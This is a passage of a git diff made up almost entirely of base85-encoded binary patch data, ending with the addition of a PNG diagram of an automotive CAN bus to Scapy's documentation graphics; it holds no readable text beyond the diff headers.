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 b;r|>$@Ajv)I`#Iyo&fXyU%V6Y@96&nU9~vx literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/automotive/DC-ZGW-CAN-Bus-.png b/doc/scapy/graphics/automotive/DC-ZGW-CAN-Bus-.png new file mode 100644 index 0000000000000000000000000000000000000000..ea778feda1a86c281a9431f7d712141a4c2e8cce GIT binary patch literal 104854 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 